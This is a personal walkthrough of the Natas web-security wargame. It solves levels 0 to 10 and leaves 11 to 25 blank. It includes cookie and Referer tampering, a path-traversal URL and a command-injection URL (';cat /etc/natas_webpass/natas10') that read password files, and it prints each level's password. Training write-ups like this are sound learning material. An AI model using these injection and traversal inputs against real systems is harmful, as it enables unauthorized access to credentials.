#Writup By Pixailz

========================================================================================================================
INTRO
========================================================================================================================
Natas teaches the basics of serverside web-security.

Each level of natas consists of its own website located at 
http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH 
login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its 
password.

Each level has access to the password of the next level. Your job is to somehow obtain that 
next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. 
the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable 
by natas4 and natas5.
========================================================================================================================

========================================================================================================================
natas0
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas0
Password: natas0
URL	: http://natas0.natas.labs.overthewire.org
========================================================================================================================
#F12 output

-->
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
<--

========================================================================================================================
Flag_Natas_00=[gtVrDuiDfck831PqWsLEZy5gyDz1clto]
========================================================================================================================

========================================================================================================================
natas1
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas1
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto
URL	: http://natas1.natas.labs.overthewire.org
========================================================================================================================

#F12 output

-->
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
<--

========================================================================================================================
Flag_Natas_01=[ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi]
========================================================================================================================

========================================================================================================================
natas2
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas2
Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
URL	: http://natas2.natas.labs.overthewire.org
========================================================================================================================
#F12 output

-->
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
<--

#Goto http://natas2.natas.labs.overthewire.org/files
#Output of http://natas2.natas.labs.overthewire.org/files/users.txt

-->
#Username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
<--

========================================================================================================================
Flag_Natas_02=[sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14]
========================================================================================================================

========================================================================================================================
natas3
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas3
Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
URL	: http://natas3.natas.labs.overthewire.org
========================================================================================================================
#URL output of http://natas3.natas.labs.overthewire.org/robots.txt
User-agent: *
Disallow: /s3cr3t/

#URL output of http://natas3.natas.labs.overthewire.org/s3cr3t/
users.txt	2016-12-20 05:15 	40 	 

#URL output of http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

========================================================================================================================
Flag_Natas_03=[Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ]
========================================================================================================================

========================================================================================================================
natas4
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
URL	: http://natas4.natas.labs.overthewire.org
========================================================================================================================
#BurpSuite intercept request, edit and resent it

Intercepted
-->
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://natas4.natas.labs.overthewire.org/index.php
DNT: 1
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
<--

Modified
-->
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://natas5.natas.labs.overthewire.org/
DNT: 1
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
<--

#F12 http://natas4.natas.labs.overthewire.org/index.php 
<div id="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>

========================================================================================================================
Flag_Natas_04=[iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq]
========================================================================================================================

========================================================================================================================
natas5
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL	: http://natas5.natas.labs.overthewire.org
========================================================================================================================
#First screen is saying that we are not logging in. if we go to the request it says
GET / HTTP/1.1

Host: natas5.natas.labs.overthewire.org
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: __utma=176859643.476636560.1578269200.1578269200.1578269200.1; __utmc=176859643; __utmz=176859643.1578269200.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=176859643.13.10.1578269200; loggedin=0
#It'seems that we have to intercept and make the options loggedin=0 to 1 with burp and here we go
#After intercepting and modifiying the site give us the pass
Access granted. 
The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

========================================================================================================================
Flag_Natas_05=[aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1]
========================================================================================================================

========================================================================================================================
natas6
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
URL	: http://natas6.natas.labs.overthewire.org
========================================================================================================================
#The main page ask us to enter a password and a View Source link is added at the end
#If we click in the link the source code give us information on how the passchecker is built in
<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>
#We can see that the binary is looking for a "secret" in includes/secret.inc
#And if we browse the source code of this page (includes/secret.inc) we can see
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
#When we enter the secret we can have the pass
Access granted. 
The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 

========================================================================================================================
Flag_Natas_06=[7z3hEENjQtflzgnT29q7wAvMNfZdh0i9]
========================================================================================================================

========================================================================================================================
natas7
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL	: http://natas7.natas.labs.overthewire.org
========================================================================================================================
#First visit the site propose 2 link called Home and About
#If we click on one of both the link change to
http://natas7.natas.labs.overthewire.org/index.php?page=home
#or
http://natas7.natas.labs.overthewire.org/index.php?page=about
#And in the source code they remind us that the password is stored to /etc/natas_webpass/natas8
#So if we modifie the link to :
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
#We have the pass
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

========================================================================================================================
Flag_Natas_07=[DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe]
========================================================================================================================

========================================================================================================================
natas8
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
URL	: http://natas8.natas.labs.overthewire.org
========================================================================================================================
#source code says
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
#so let's first reverse engeneering and decode encodedsecret
3d3d516343746d4d6d6c315669563362 from hex ==QcCtmMml1ViV3b
==QcCtmMml1ViV3b reversed b3ViV1lmMmtCcQ==
b3ViV1lmMmtCcQ== from base64
oubWYf2kBq
#hit sumbit and there you go
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

========================================================================================================================
Flag_Natas_08=[W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl]
========================================================================================================================

========================================================================================================================
natas9
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
URL	    : http://natas9.natas.labs.overthewire.org
========================================================================================================================
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>
#Commande injection
http://natas9.natas.labs.overthewire.org/?needle=;cat%20/etc/natas_webpass/natas10
#Output:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

African
Africans
Allah
[...]

========================================================================================================================
Flag_Natas_09=[nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu]
========================================================================================================================

========================================================================================================================
natas10
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas10
Password:
URL	: http://natas10.natas.labs.overthewire.org
========================================================================================================================
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
========================================================================================================================
Flag_Natas_10=[U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK]
========================================================================================================================

========================================================================================================================
natas11
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas11
Password:
URL	: http://natas11.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_11=[]
========================================================================================================================

========================================================================================================================
natas12
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas12
Password:
URL	: http://natas12.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_12=[]
========================================================================================================================

========================================================================================================================
natas13
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas13
Password:
URL	: http://natas13.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_13=[]
========================================================================================================================

========================================================================================================================
natas14
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas14
Password:
URL	: http://natas14.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_14=[]
========================================================================================================================

========================================================================================================================
natas15
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas15
Password:
URL	: http://natas15.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_15=[]
========================================================================================================================

========================================================================================================================
natas16
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas16
Password:
URL	: http://natas16.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_16=[]
========================================================================================================================

========================================================================================================================
natas17
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas17
Password:
URL	: http://natas17.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_17=[]
========================================================================================================================

========================================================================================================================
natas18
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas18
Password:
URL	: http://natas18.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_18=[]
========================================================================================================================

========================================================================================================================
natas19
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas19
Password:
URL	: http://natas19.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_19=[]
========================================================================================================================

========================================================================================================================
natas20
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas20
Password:
URL	: http://natas20.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_20=[]
========================================================================================================================

========================================================================================================================
natas21
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas21
Password:
URL	: http://natas21.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_21=[]
========================================================================================================================

========================================================================================================================
natas22
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas22
Password:
URL	: http://natas22.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_22=[]
========================================================================================================================

========================================================================================================================
natas23
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas23
Password:
URL	: http://natas23.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_23=[]
========================================================================================================================

========================================================================================================================
natas24
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas24
Password:
URL	: http://natas24.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_24=[]
========================================================================================================================

========================================================================================================================
natas25
========================================================================================================================
INFO
------------------------------------------------------------------------------------------------------------------------
Username: natas25
Password:
URL	: http://natas25.natas.labs.overthewire.org
========================================================================================================================

========================================================================================================================
Flag_Natas_25=[]
========================================================================================================================
